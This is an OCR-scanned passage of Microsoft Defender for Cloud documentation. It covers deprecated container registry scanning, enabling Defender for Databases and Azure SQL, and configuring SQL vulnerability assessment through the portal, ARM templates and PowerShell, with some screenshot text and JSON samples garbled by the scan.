
Is Defender for Containers a mandatory upgrade? 


No. Subscriptions that have either Microsoft Defender for Kubernetes or Microsoft 
Defender for Containers Registries enabled doesn't need to be upgraded to the new 
Microsoft Defender for Containers plan. However, they won't benefit from the new and 
improved capabilities and they'll have an upgrade icon shown alongside them in the 
Azure portal. 


How can | calculate my potential price change? 


In order to help you understand your costs, Defender for Cloud offers the Price 
Estimation workbook as part of its published Workbooks. The Price Estimation workbook 
allows you to estimate the expected price for Defender for Cloud plans before enabling 
them. 


Your price is dependent on your container architecture and coverage. Learn how to 
enable and use £Z the Price Estimation workbook. 


Next steps 


In this article, you learned about Kubernetes protection in Defender for Cloud, including 
Microsoft Defender for Kubernetes. 


Enable enhanced protections 


For related material, see the following articles: 


e Stream alerts to a SIEM, SOAR, or IT Service Management solution 
e Reference table of alerts 


Introduction to Microsoft Defender for 
container registries (deprecated) 


Article e 06/18/2023 


Azure Container Registry (ACR) is a managed, private Docker registry service that stores 
and manages your container images for Azure deployments in a central registry. It's 
based on the open-source Docker Registry 2.0. 


To protect the Azure Resource Manager based registries in your subscription, enable 
Microsoft Defender for container registries at the subscription level. Defender for 
Cloud will then scan all images when they're pushed to the registry, imported into the 
registry, or pulled within the last 30 days. You'll be charged for every image that gets 
scanned — once per image. 


Availability 


@ Important 


Microsoft Defender for container registries has been replaced with Microsoft 
Defender for Containers. If you've already enabled Defender for container 
registries on a subscription, you can continue to use it. However, you won't get 
Defender for Containers’ improvements and new features. 


This plan is no longer available for subscriptions where it isn't already enabled. 


To upgrade to Microsoft Defender for Containers, open the Defender plans page in 
the portal and enable the new plan: 


Ga Kubernetes (deprecated) 2 kubernetes cores © Update available © Gri off 


d Container registries (deprecated) 1 container registries © Update availabe © | 


Learn more about this change in the release note. 


Aspect Details 


Release state: Deprecated (Use Microsoft Defender for Containers) 


Aspect 


Supported 
registries and 
images: 


Unsupported 
registries and 


Details 


Linux images in ACR registries accessible from the public internet with shell 
access 
ACR registries protected with Azure Private Link 


Windows images 
‘Private’ registries (unless access is granted to Trusted Services) 


images: Super-minimalist images such as Docker scratch “ images, or "Distroless" images 
that only contain an application and its runtime dependencies without a package 
manager, shell, or OS 
Images with Open Container Initiative (OCI) Image Format Specification £ 

Required Security reader and Azure Container Registry roles and permissions 

roles and 

permissions: 

Clouds: Lv] Commercial clouds 


© National (Azure Government, Azure China 21Vianet) 


What are the benefits of Microsoft Defender 
for container registries? 


Defender for Cloud identifies Azure Resource Manager based ACR registries in your 
subscription and seamlessly provides Azure-native vulnerability assessment and 


management for your registry's images. 


Microsoft Defender for container registries includes a vulnerability scanner to scan the 
images in your Azure Resource Manager-based Azure Container Registry registries and 
provide deeper visibility into your images' vulnerabilities. The integrated scanner is 
powered by Qualys, the industry-leading vulnerability scanning vendor. 


When issues are found — by Qualys or Defender for Cloud — you'll get notified in the 
workload protection dashboard. For every vulnerability, Defender for Cloud provides 
actionable recommendations, along with a severity classification, and guidance for how 
to remediate the issue. For details of Defender for Cloud's recommendations for 
containers, see the reference list of recommendations. 


Defender for Cloud filters and classifies findings from the scanner. When an image is 
healthy, Defender for Cloud marks it as such. Defender for Cloud generates security 
recommendations only for images that have issues to be resolved. Defender for Cloud 
provides details of each reported vulnerability and a severity classification. Additionally, 
it gives guidance for how to remediate the specific vulnerabilities found on each image. 


By only notifying when there are problems, Defender for Cloud reduces the potential for 


unwanted informational alerts. 


When are images scanned? 


There are three triggers for an image scan: 


e On push - Whenever an image is pushed to your registry, Defender for container 


registries automatically scans that image. To trigger the scan of an image, push it 


to your repository. 


e Recently pulled - Since new vulnerabilities are discovered every day, Microsoft 


Defender for container registries also scans, on a weekly basis, any image that has 


been pulled within the last 30 days. There's no additional charge for these rescans; 


as mentioned above, you're billed once per image. 


e On import - Azure Container Registry has import tools to bring images to your 


registry from Docker Hub, Microsoft Container Registry, or another Azure container 


registry. Microsoft Defender for container registries scans any supported images 


you import. Learn more in Import container images to a container registry. 


The scan completes typically within 2 minutes, but it might take up to 40 minutes. 


Findings are made available as security recommendations such as this one: 


Container registry images should have vulnerability findings resolved 


© Exempt © Disable rule ZZ View policy definition E Open query 


Unhealthy registries Severity Total vulnerabilities Vulnerabilities by severity Registries with most vulnerabilities Total vulnerable image: 
A 20/24 | High (x) 360 High 4 pe dmt 232 88 
Medium 311 Emmě ima 120 Out of 318 scanned 
Low 11 asd 93 
v Description 
v Remediation steps 
v Affected resources 
^ Security Checks 
Findings Disabled findings 
[O Search to filter items. 
D Security Check Category Applies To Severity Patch Available 
372268 GNU Bash Privilege Escalation Vulnerability for Debian Local 29 of 318 Scanned Images @ High No 
178391 Debian Security Update Multiple Vulnerabilities for perl Debian 13 of 318 Scanned Images O High Yes 
178369 Debian Security Update for tzdata (DLA 2424-1) Debian 12 of 318 Scanned Images @ High Yes 
176875 Debian Security Update for systemd Debian 7 of 318 Scanned Images @ High Yes 
177442 Debian Security Update for file (DSA 4550-1) Debian 6 of 318 Scanned Images @ High Yes 
176750 Debian Security Update for apache2 (DSA 4422-1) Debian 6 of 318 Scanned Images @ High Yes 
178486 Debian Security Update for Open Secure Sockets Layer (OpenSSL) i, Debian 5 of 318 Scanned Images O High Yes 
374644 Go XML attribute instability Vulnerability Local 5 of 318 Scanned Images @ High No 
178701 Debian Security Update for apache2 (DLA 2706-1) Debian 4 of 318 Scanned Images @ High Yes 
176853 Debian Security Update for libssh2 (DSA 4431-1) Debian 4 of 318 Scanned Images © High Yes 


78391-Debian Security Update M... x 


A Description 
Perl is a family of two high-level, general-purpose, interpreted, 
dynamic programming languages. 
Perl is found to be affected by Heap based buffer overflow and 


integer overflow vulnerability. 


Affected OS: 
Debian 9 


Debian 10 


^ General information 


iD 178391 
Severity @ High 

Type Vulnerability 

Published 2/2/2021, 3:47 PM GMT+2 
Patchable Yes 

Cvss 3,0 base score 86 

CVEs CVE-2020-10543 of 


CVE-2020-10878 cf 
CVE-2020-12723 of 


~ Remediation 
The Customers are advised to update Perl here 


Patch: 


Following are links for downloading patches to fix the vulnerabilities: 
Debian 10 


Debian 9 


~ Additional information 
Vendor references CVE-2020-10543 of 
CVE-2020-10878 of 


CVE-2020-12723 d 


~ Affected resources 


Ga 


Digest Repository 
E 532 netcore chiges 
E 729 node chigea 


How does Defender for Cloud work with Azure 
Container Registry 


Below is a high-level diagram of the components and benefits of protecting your 


registries with Defender for Cloud. 
Discovery of Vulnerable 
D ACR container images 
Actionable uuu O 
Microsoft Defender for Cloud recommendations OO 
UW) Vulnerabilities details with 


severity classification 


Push container image 


Azure Region a 


Azure Container Azure Container Azure Container 
Registry Registry Registry 


Microsoft Defender for Cloud 
Vulnerability scanning Qualys 


FAQ - Azure Container Registry image scanning 


How does Defender for Cloud scan an image? 


Defender for Cloud pulls the image from the registry and runs it in an isolated sandbox 
with the Qualys scanner. The scanner extracts a list of known vulnerabilities. 


Defender for Cloud filters and classifies findings from the scanner. When an image is 
healthy, Defender for Cloud marks it as such. Defender for Cloud generates security 
recommendations only for images that have issues to be resolved. By only notifying you 
when there are problems, Defender for Cloud reduces the potential for unwanted 


informational alerts. 


Can I get the scan results via REST API? 


Yes. The results are under Sub-Assessments REST API. Also, you can use Azure Resource 
Graph (ARG), the Kusto-like API for all of your resources: a query can fetch a specific 
scan. 


What registry types are scanned? What types are billed? 


For a list of the types of container registries supported by Microsoft Defender for 
container registries, see Availability. 


If you connect unsupported registries to your Azure subscription, Defender for Cloud 
won't scan them and won't bill you for them. 


Can | customize the findings from the vulnerability 
scanner? 


Yes. If you have an organizational need to ignore a finding, rather than remediate it, you 
can optionally disable it. Disabled findings don't impact your secure score or generate 


unwanted noise. 


Learn about creating rules to disable findings from the integrated vulnerability 
assessment tool. 


Why is Defender for Cloud alerting me to vulnerabilities 
about an image that isn't in my registry? 


Defender for Cloud provides vulnerability assessments for every image pushed or pulled 
in a registry. Some images may reuse tags from an image that was already scanned. For 
example, you may reassign the tag “Latest” every time you add an image to a digest. In 
such cases, the ‘old’ image does still exist in the registry and may still be pulled by its 
digest. If the image has security findings and is pulled, it'll expose security 
vulnerabilities. 


Next steps 


Scan your images for vulnerabilities 


Protect your databases with Defender 
for Databases 


Article e 06/29/2023 


Defender for Databases in Microsoft Defender for Cloud allows you to protect your 
entire database estate with attack detection and threat response for the most popular 
database types in Azure. Defender for Cloud provides protection for the database 
engines and for data types, according to their attack surface and security risks. 


Database protection includes: 


e Microsoft Defender for Azure SQL databases 

e Microsoft Defender for SQL servers on machines 

e Microsoft Defender for open-source relational databases 
e Microsoft Defender for Azure Cosmos DB 


These four database protection plans are priced separately. Get more info about 
Defender for Cloud's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription”. 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e Connect your non-Azure machines, AWS account or GCP projects. 


Enable the Databases plan 


When you enable database protection, you enable all four of the Defender plans and 
protect all of the supported databases on your subscription. 


To enable Defender for Databases on your subscription: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant Azure subscription, AWS account or GCP project. 


5. On the Defender plans page, toggle the Databases plan to On. 
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Enable specific plans database protections 


When you enable database protection, you enable the following four Defender plans: 


e Defender for Azure SQL databases 

e Defender for SQL server on machines 

e Defender for open-source relational databases 
e Defender for Azure Cosmos DB 


These plans protect all of the supported databases in your subscription. 
To enable specific database protections on your subscription: 

1. Sign in to the Azure portal £. 

2. Search for and select Microsoft Defender for Cloud. 

3. In the Defender for Cloud menu, select Environment settings. 

4. Select the relevant subscription. 


5. On the Defender plans page, locate the Databases plan and select Select types. 


Home > Microsoft Defender for Cloud | Environment settings 


e Settings | Defender plans x 
P Search E save settings & monitoring 
ZO 


Enable all plans 


Defender plans 


O tionn A Cloud Security Posture Management (CSPM) 


3 rum automation 
Microsoft Defender CSM prov 


s including agentes uren 


ning the cloud pr and advanced threat hunting. Pricing is basse en subscription se, with biling applying orly fer Servers, Databases, andi Storage resources at nr rraren 


advanced security posture capabi 


PEON Foundations CSP includes aset covery continuous assessment and Securty recommendations Tor posture hardening and a Secure score rae paz Of your zeraren posture: 
Policy settings pan Pricing Resource quantity Monitoring coverage status 
€ perra 

D Foundations! csom Sr Can on) 
© Governance rules 

© beza EEEren resources © 

A Cloud Workload Protection (CWP) 

Microsoft Defender for Cloud provides comprehensive; cout -ative protections fom development to runtime in muhi-cloud envionment, 

an Pricing Resource quantity Monitoring coverage sans 
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[6] Resource Manager 
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When you select Save, Micrasoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 30 days are free. 
For more information on Defender for Cloud pricing, visit the pricing page. 


6. In the Resource types selection window, toggle the desired plans to On or Off. 


Resource types selection x 


Defender for cloud offers protection for a variety of database resource types, both SQL 
servers and managed cloud database services. Learn more 


soul Azure SQL Databases © (C o (E) 


Pricing: /Server/Month 

Resource quantity: 1 servers 
EO SQL servers on machines © Cor am] 

Pricing: /Server/Month - servers in Azure 


/Core/Hour - servers outside Azure 


Resource quantity: 0 servers 


E Open-source relational databases © (Off On 


Pricing: /Server/Month 
Resource quantity: 0 servers 
+ S 
di Azure Cosmos DB © ( GUEL on) 
Pricing: /s per hour 
Resource quantity: 0 Azure Cosmos DB accounts 


®© 


7. (Optional) Exclude specific database resource types by toggling them to Off. 
8. Select Continue. 


9. Select Save. 


Next steps 


Overview of Microsoft Defender for Azure SQL 


Microsoft Defender for SQL servers on machines 


Overview of Microsoft Defender for open-source relational databases 


Overview of Microsoft Defender for Azure Cosmos DB 


Overview of Microsoft Defender for 
Azure SQL 
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Microsoft Defender for Azure SQL helps you discover and mitigate potential database 
vulnerabilities and alerts you to anomalous activities that may be an indication of a 
threat to your databases. 


e Vulnerability assessment: Scan databases to discover, track, and remediate 
vulnerabilities. Learn more about vulnerability assessment. 

e Threat protection: Receive detailed security alerts and recommended actions based 
on SQL Advanced Threat Protection to provide to mitigate threats. Learn more 
about SQL Advanced Threat Protection. 


When you enable Microsoft Defender for Azure SQL, all supported resources that exist 
within the subscription are protected. Future resources created on the same subscription 
will also be protected. 


Availability 


Aspect Details 

Release Generally available (GA) 

state: 

Pricing: Microsoft Defender for Azure SQL is billed as shown on the pricing page“ 
Protected Read-write replicas of: 

SQL - Azure SQL single databases and elastic pools 

versions: - Azure SQL Managed Instance 


- Azure Synapse Analytics (formerly SQL DW) dedicated SQL pool 


Clouds: Lv] Commercial clouds 
Lv] Azure Government 
Lv] Azure China 21Vianet (Partial: Subset of alerts and vulnerability assessment for 
SQL servers. Behavioral threat protections aren't available.) 


What are the benefits of Microsoft Defender 
for Azure SQL? 


Discover and mitigate vulnerabilities 


A vulnerability assessment service discovers, tracks, and helps you remediate potential 
database vulnerabilities. Assessment scans provide an overview of your SQL machines’ 
security state, and details of any security findings. Defender for Azure SQL helps you 
identify and mitigate potential database vulnerabilities and detecting anomalous 
activities that could indicate threats to your databases. 


Learn more about vulnerability assessment for Azure SQL Database. 


Advanced threat protection 


An advanced threat protection service continuously monitors your SQL servers for 
threats such as SQL injection, brute-force attacks, and privilege abuse. This service 
provides action-oriented security alerts in Microsoft Defender for Cloud with details of 
the suspicious activity, guidance on how to mitigate to the threats, and options for 
continuing your investigations with Microsoft Sentinel. Learn more about advanced 
threat protection. 


Threat intelligence enriched security alerts are triggered when there's: 


e Potential SQL injection attacks - including vulnerabilities detected when 
applications generate a faulty SQL statement in the database 

e Anomalous database access and query patterns - for example, an abnormally 
high number of failed sign-in attempts with different credentials (a brute force 
attempt) 

e Suspicious database activity - for example, a legitimate user accessing an SQL 
Server from a breached computer which communicated with a crypto-mining C&C 


server 


Alerts include details of the incident that triggered them, as well as recommendations 
on how to investigate and remediate threats. Learn more about the security alerts for 
SQL servers. 


Next steps 


In this article, you learned about Microsoft Defender for Azure SQL. Now you can: 


e Enable Microsoft Defender for Azure SQL 
e How Microsoft Defender for Azure SQL can protect SQL servers anywhere Z. 
e Set up email notifications for security alerts 


SQL vulnerability assessment helps you 
identify database vulnerabilities 
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SQL vulnerability assessment is an easy-to-configure service that can discover, track, and 
help you remediate potential database vulnerabilities. Use it to proactively improve your 
database security for: 


@ Azure SQL Database @ Azure SQL Managed Instance © azure Synapse Analytics 


Vulnerability assessment is part of Microsoft Defender for Azure SQL, which is a unified 
package for advanced SQL security capabilities. Vulnerability assessment can be 
accessed and managed from each SQL database resource in the Azure portal. 


O Note 


Vulnerability assessment is supported for Azure SQL Database, Azure SQL Managed 
Instance, and Azure Synapse Analytics. Databases in Azure SQL Database, Azure 
SQL Managed Instance, and Azure Synapse Analytics are referred to collectively in 
the remainder of this article as databases, and the server is referring to the server 
that hosts databases for Azure SQL Database and Azure Synapse. 


What is SQL vulnerability assessment? 


SQL vulnerability assessment is a service that provides visibility into your security state. 
Vulnerability assessment includes actionable steps to resolve security issues and 
enhance your database security. It can help you to monitor a dynamic database 
environment where changes are difficult to track and improve your SQL security posture. 


Vulnerability assessment is a scanning service built into Azure SQL Database. The service 
employs a knowledge base of rules that flag security vulnerabilities. It highlights 
deviations from best practices, such as misconfigurations, excessive permissions, and 
unprotected sensitive data. 


The rules are based on Microsoft's best practices and focus on the security issues that 
present the biggest risks to your database and its valuable data. They cover database- 
level issues and server-level security issues, like server firewall settings and server-level 


permissions. 


Results of the scan include actionable steps to resolve each issue and provide 


customized remediation scripts where applicable. You can customize an assessment 


report for your environment by setting an acceptable baseline for: 


e Permission configurations 


e Feature configurations 


e Database settings 


What are the express and classic 
configurations? 


You can configure vulnerability assessment for your SQL databases with either: 


e Express configuration — The default procedure that lets you configure vulnerability 


assessment without dependency on external storage to store baseline and scan 


result data. 


e Classic configuration — The legacy procedure that requires you to manage an 


Azure storage account to store baseline and scan result data. 


What's the difference between the express and classic 
configuration? 


Configuration modes benefits and limitations comparison: 


Parameter 


Supported SQL 
Flavors 


Supported Policy 
Scope 


Dependencies 


Recurring scan 


Supported Rules 


Express configuration 


e Azure SQL Database 
e Azure Synapse Dedicated SQL 
Pools (formerly SQL DW) 


e Subscription 
e Server 


None 


e Always active 
e Scan scheduling is internal and not 
configurable 


All vulnerability assessment rules for 
the supported resource type. 


Classic configuration 


e Azure SQL Database 
e Azure SQL Managed Instance 
e Azure Synapse Analytics 


e Subscription 
e Server 
e Database 


Azure storage account 


e Configurable on/off 
Scan scheduling is internal and not 
configurable 


All vulnerability assessment rules for 
the supported resource type. 


Parameter Express configuration Classic configuration 


Baseline Settings e Batch — several rules in one e Single rule 
command 
e Set by latest scan results 


e Single rule 
Apply baseline Will take effect without rescanning Will take effect only after 
the database rescanning the database 
Single rule scan Maximum of 1 MB Unlimited 
result size 
Email notifications e Logic Apps e Internal scheduler 
e Logic Apps 
Scan export Azure Resource Graph Excel format, Azure Resource Graph 
Supported Clouds © Commercial clouds Lv] Commercial clouds 
* Azure Government Lv] Azure Government 
* Microsoft Azure operated by Lv] Azure operated by 21Vianet 
21Vianet 


Next steps 


e Enable SQL vulnerability assessments 

e Express configuration common questions and Troubleshooting. 

e Learn more about Microsoft Defender for Azure SQL. 

e Learn more about data discovery and classification. 

e Learn more about storing vulnerability assessment scan results in a storage 
account accessible behind firewalls and VNets. 


Enable vulnerability assessment on your 
Azure SQL databases 
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In this article, you'll learn how to enable vulnerability assessment so you can find and 
remediate database vulnerabilities. We recommend that you enable vulnerability 
assessment using the express configuration so you aren't dependent on a storage 
account. You can also enable vulnerability assessment using the classic configuration. 


When you enable the Defender for Azure SQL plan in Defender for Cloud, Defender for 
Cloud automatically enables Advanced Threat Protection and vulnerability assessment 
with the express configuration for all Azure SQL databases in the selected subscription. 


e |f you have Azure SQL databases with vulnerability assessment disabled, you can 
enable vulnerability assessment in the express or classic configuration. 

e If you have Azure SQL databases with vulnerability assessment enabled in the 
classic configuration, you can enable the express configuration so that assessments 
don't require a storage account. 


Prerequisites 


e Make sure that Microsoft Defender for Azure SQL is enabled so that you can run 
scans on your Azure SQL databases. 

e Make sure you read and understand the differences between the express and 
classic configuration. 


Enable vulnerability assessment 


When you enable the Defender for Azure SQL plan in Defender for Cloud, Defender for 
Cloud automatically enables Advanced Threat Protection and vulnerability assessment 
with the express configuration for all Azure SQL databases in the selected subscription. 


You can enable vulnerability assessment in two ways: 
e Express configuration 


e Classic configuration 


Express configuration 


To enable vulnerability assessment without a storage account, using the express 
configuration: 


1. Sign in to the Azure portal £. 

2. Open the specific Azure SQL Database resource. 

3. Under the Security heading, select Defender for Cloud. 

4. Enable the express configuration of vulnerability assessment: 


e If vulnerability assessment is not configured, select Enable in the notice that 
prompts you to enable the vulnerability assessment express configuration, 
and confirm the change. 


y TO 


Enablement Status: Enabled at the subscription-level (Configure) © 


A SQL Vulnerability Assessment is not configured. Click to 
enable express configuration Learn more 


You can also select Configure and then select Enable in the Microsoft 
Defender for SQL settings: 


VULNERABILITY ASSESSMENT SETTINGS 


A SQL Vulnerability Assessment is not configured. Click to enable with SQL Vulnerability 
Assessment express configuration. Express configuration will be saved as the 
default for when you turn off Defender for SQL on this server and then turn it back 
on. Learn more 


Select Enable to use the vulnerability assessment express configuration. 
e If vulnerability assessment is already configured, select Enable in the notice 
that prompts you to switch to express configuration, and confirm the change. 
@ Important 


Baselines and scan history are not migrated. 


Enablement Status: Enabled at the subscription-level (Configure) © 


GA Switch to the new express configuration experience for 
SQL Vulnerability Assessment Learn more 


You can also select Configure and then select Enable in the Microsoft 
Defender for SQL settings: 


VULNERABILITY ASSESSMENT SETTINGS 


GA Switch to the new express configuration experience for SQL Vulnerability Assessment 
Express configuration will be saved as the default for when you turn off 
Defender for SQL on this server and then turn it back on. Learn more 


Now you can go to the SQL databases should have vulnerability findings resolved Z 
recommendation to see the vulnerabilities found in your databases. You can also run 
on-demand vulnerability assessment scans to see the current findings. 

© Note 


Each database is randomly assigned a scan time on a set day of the week. 


Enable express vulnerability assessment at scale 


If you have SQL resources that don't have Advanced Threat Protection and vulnerability 
assessment enabled, you can use the SQL vulnerability assessment APIs to enable SQL 


vulnerability assessment with the express configuration at scale. 


Classic configuration 
To enable vulnerability assessment with a storage account, use the classic configuration: 


1. In the Azure portal “, open the specific resource in Azure SQL Database, SQL 
Managed Instance Database, or Azure Synapse. 


2. Under the Security heading, select Defender for Cloud. 


3. Select Configure on the link to open the Microsoft Defender for SQL settings pane 


for either the entire server or managed instance. 


0 sql-dev-1 | Microsoft Defender for Cloud 


SQL server 


[a] Visit Microsoft Defender for Cloud to manage security across your virtual networks, data, apps, and more 


Ø Search 


23 Import/Export history 


Security Recommendations Security alerts Findings Enablement Status: Enabled at the subscription-level (Configure) © 
Networkin: 
E 3 5 ® 0 DU 3 E OO Switch to the new express configuration experience for 
SQL Vulnerability Assessment (preview). Learn more 


© Microsoft Defender for Cloud 
D Transparent data encryption Enable | 


® Identity 


4. In the Server settings page, enter the Microsoft Defender for SQL settings: 


Server settings 


sqliserverlascdemo 
Save X Discard © Feedback 
AZURE DEFENDER FOR SQL 


> =... TN 
Gam ZE. 


Azure Defender for SQL costs 15 USD/server/month. It includes Vulnerability 
Assessment and Advanced Threat Protection. We invite you to a trial period for the 
first 30 days, without charge. 


VULNERABILITY ASSESSMENT SETTINGS 


Subscription 5 
ASC DEMO 

*Storage account 5 
sqlva3o6wkwcy3i2h2 © 


Periodic recurring scans 
da N 
ge ee © 


Scans will be triggered automatically once a week. In most cases, it will be on the day 
Vulnerability Assessment has been enabled and saved. A scan result summary will be sent to 
the email addresses you provide. 


Send scan reports to @ 
owners@contoso.com v 


Also send email notification to admins and subscription owners © 


ADVANCED THREAT PROTECTION SETTINGS 


Send alerts to © 
responseteam@contoso.com ZA 


Also send email notification to admins and subscription owners © 


Advanced Threat Protection types ` 
All 


a. Configure a storage account where your scan results for all databases on the 
server or managed instance will be stored. For information about storage 


accounts, see About Azure storage accounts. 


b. To configure vulnerability assessments to automatically run weekly scans to 
detect security misconfigurations, set Periodic recurring scans to On. The 
results are sent to the email addresses you provide in Send scan reports to. You 


can also send email notification to admins and subscription owners by enabling 
Also send email notification to admins and subscription owners. 


O Note 


Each database is randomly assigned a scan time on a set day of the week. 
Email notifications are scheduled randomly per server on a set day of the 
week. The email notification report includes data from all recurring 


database scans that were executed during the preceding week (does not 
include on-demand scans). 


Next steps 


Learn more about: 


e Microsoft Defender for Azure SQL 
e Data discovery and classification 


e Storing scan results in a storage account behind firewalls and VNets 


Manage vulnerability findings in your 
Azure SQL databases 
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Microsoft Defender for Cloud provides vulnerability assessment for your Azure SQL 
databases. Vulnerability assessment scans your databases for software vulnerabilities 
and provides a list of findings. You can use the findings to remediate software 


vulnerabilities and disable findings. 


Prerequisites 


Make sure that you know whether you're using the express or classic configurations 


before you continue. 
To see which configuration you're using: 


1. In the Azure portal Z, open the specific resource in Azure SQL Database, SQL 
Managed Instance Database, or Azure Synapse. 

2. Under the Security heading, select Defender for Cloud. 

3. In the Enablement Status, select Configure to open the Microsoft Defender for 


SQL settings pane for either the entire server or managed instance. 


If the vulnerability settings show the option to configure a storage account, you're using 
the classic configuration. If not, you're using the express configuration. 


e Express configuration 
e Classic configuration 


Express configuration 


View scan history 


Select Scan History in the vulnerability assessment pane to view a history of all scans 


previously run on this database. 


Express configuration doesn't store scan results if they're identical to previous scans. The 
scan time shown in the scan history is the time of the last scan where the scan results 


changed. 


Disable specific findings from Microsoft Defender for 
Cloud (preview) 


If you have an organizational need to ignore a finding rather than remediate it, you can 
disable the finding. Disabled findings don't impact your secure score or generate 
unwanted noise. You can see the disabled finding in the "Not applicable" section of the 


scan results. 


When a finding matches the criteria you've defined in your disable rules, it won't appear 
in the list of findings. Typical scenarios may include: 


e Disable findings with medium or lower severity 
e Disable findings that are non-patchable 
e Disable findings from benchmarks that aren't of interest for a defined scope 
@ Important 
To disable specific findings, you need permissions to edit a policy in Azure Policy. 
Learn more in Azure RBAC permissions in Azure Policy. 

To create a rule: 


1. From the recommendations detail page for Vulnerability assessment findings on 
your SQL servers on machines should be remediated, select Disable rule. 


2. Select the relevant scope. 
3. Define your criteria. You can use any of the following criteria: 


e Finding ID 
e Severity 
e Benchmarks 


4. Create a disable rule for VA findings on SQL servers on machines 
5. Select Apply rule. Changes might take up to 24 hrs to take effect. 


6. To view, override, or delete a rule: 
a. Select Disable rule. 
b. From the scope list, subscriptions with active rules show as Rule applied. 
c. To view or delete the rule, select the ellipsis menu ("..."). 


Configure email notifications using Azure Logic Apps 


To receive regular updates of the vulnerability assessment status for your database, you 


can use the customizable Azure Logic Apps template £. 


Using the template will allow you to: 


e Choose the timing of the email reports. 


e Have a consistent view of your vulnerability assessment status that includes 


disabled rules. 


e Send reports for Azure SQL Servers and SQL VMs. 
e Customize report structure and look-and-feel to match your organizational 


standards. 


Manage vulnerability assessments programmatically 


The express configuration is supported in the latest REST API version with the following 


functionality: 


Description 


Baseline bulk operations 


Baseline bulk operations 


Single rule baseline operations 


Single rule baseline operations 


Single scan results 


Single scan results 


Scan details (summary) 


Scan details (summary) 


Execute manual scan 


Scope 


System 
Database 


User 
Database 


User 
Database 


System 
Database 


User 
Database 


System 
Database 


User 
Database 


System 
Database 


User 
Database 


API 


Sql Vulnerability Assessment 
Baselines 
Sql Vulnerability Assessment Baseline 


Database Sql Vulnerability 
Assessment Baselines 


Database Sql Vulnerability 
Assessment Rule Baselines 


Sql Vulnerability Assessment Rule 
Baselines 

Sql Vulnerability Assessment Rule 
Baseline 


Database Sql Vulnerability 
Assessment Scan Result 


Sql Vulnerability Assessment Scan 
Result 


Database Sql Vulnerability 
Assessment Scans 


Sql Vulnerability Assessment Scans 


Database Sql Vulnerability 
Assessment Execute Scan 


Description 


Execute manual scan 


VA settings (GET only is supported for 
Express Configuration) 


VA Settings operations 


Scope 


System 
Database 


User 
Database 


Server 


API 


Sql Vulnerability Assessment Execute 
Scan 


Database Sql Vulnerability 
Assessments Settings 


Sql Vulnerability Assessments 
Settings 
Sql Vulnerability Assessments 


Using Azure Resource Manager templates 


Use the following ARM template” to create a new Azure SQL Logical Server with 


express configuration for SQL vulnerability assessment. 


To configure vulnerability assessment baselines by using Azure Resource Manager 


templates, use the 


Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines type. Make 


sure that vulnerabilityAssessments is enabled before you add baselines. 


Here are several examples to how you can set up baselines using ARM templates: 


e Setup batch baseline based on latest scan results: 


JSON 


"type": 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 


3 


"apiVersion": "2@22-02-@1-preview", 


"name": "[concat(parameters('serverName'),'/', 
'/default/default')]", 


parameters('databaseName') , 


"properties": { 


"latestScan": true 


} 


e Setup batch baseline based on specific results: 


JSON 


"type": 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 


3 


"apiVersion": "2@22-02-@1-preview", 
"name": "“[concat(parameters('serverName'),'/', 
parameters('databaseName') , '/default/default')]", 

"properties": { 

"latestScan": false, 

"results": { 

"VA2065": [ 

[ 
"FirewallRuleName3", 
1622927157675 


EAE «ARAS: 
l 
[ 
"FirewallRuleName4", 
162.92. T5768 a 
G2 OA, 15,83 
] 
l 
NPRONEYS | 
[ 
"dbo" 
] 
] 


e Set up baseline for a specific rule: 


JSON 


"type": 
"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines/ 
rules", 

"apiVersion": "2022-02-@1-preview", 

"name": "[concat(parameters('serverName'),'/', 
parameters('databaseName') , '/default/default/VA1143')]", 

“properties”: { 

"latestScan": false, 

"results": [ 

[ "True" ] 


] 


e Set up batch baselines on the master database based on latest scan results: 


JSON 


"type" : 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines" 


3 
"apiVersion": "2@22-02-@1-preview", 
"name": " 
[concat(parameters('serverName'),'/master/default/default')]", 
"properties": { 
"latestScan": true 


} 


Using PowerShell 


Express configuration isn't supported in PowerShell cmdlets but you can use PowerShell 
to invoke the latest vulnerability assessment capabilities using REST API, for example: 


e Enable express configuration on an Azure SQL Server 
e Setup baselines based on latest scan results for all databases in an Azure SQL 


Server 
e Express configuration PowerShell commands reference 


Using Azure CLI 


Invoke express configuration using Azure CLI. 
Troubleshooting 


Revert back to the classic configuration 


To change an Azure SQL database from the express vulnerability assessment 


configuration to the classic configuration: 
1. Disable the Defender for Azure SQL plan from the Azure portal. 


2. Use PowerShell to reconfigure using the classic experience: 


PowerShell 


Update-AzSqlServerAdvancedThreatProtectionSetting ` 
-ResourceGroupName "“demo-rg" ` 
-ServerName "dbsrvi" ` 
-Enable 1 

Update-AzSqlServerVulnerabilityAssessmentSetting ` 
-ResourceGroupName “demo-rg" ` 
-ServerName "dbsrvi" ` 
-StorageAccountName "“mystorage" ` 


-RecurringScansInterval Weekly ` 
-ScanResultsContainerName "vulnerability-assessment" 


You may have to tweak Update-AzSqlServerVulnerabilityAssessmentSetting 


according to Store Vulnerability Assessment scan results in a storage account 
accessible behind firewalls and VNets. 


Errors 


“Vulnerability Assessment is enabled on this server or one of its underlying databases 


with an incompatible version” 
Possible causes: 
e Switching to express configuration failed due to a server policy error. 


Solution: Try again to enable the express configuration. If the issue persists, try to 
disable the Microsoft Defender for SQL in the Azure SQL resource, select Save, 
enable Microsoft Defender for SQL again, and select Save. 


e Switching to express configuration failed due to a database policy error. Database 
policies aren't visible in the Azure portal for Defender for SQL vulnerability 
assessment, so we check for them during the validation stage of switching to 
express configuration. 


Solution: Disable all database policies for the relevant server and then try to switch 
to express configuration again. Cosnider using the provided PowerShell script for 


assistance. 


Classic configuration 


View scan history 
Select Scan History in the vulnerability assessment pane to view a history of all scans 


previously run on this database. 


Disable specific findings from Microsoft Defender for 
Cloud (preview) 


If you have an organizational need to ignore a finding, rather than remediate it, you can 
optionally disable it. Disabled findings don't impact your secure score or generate 


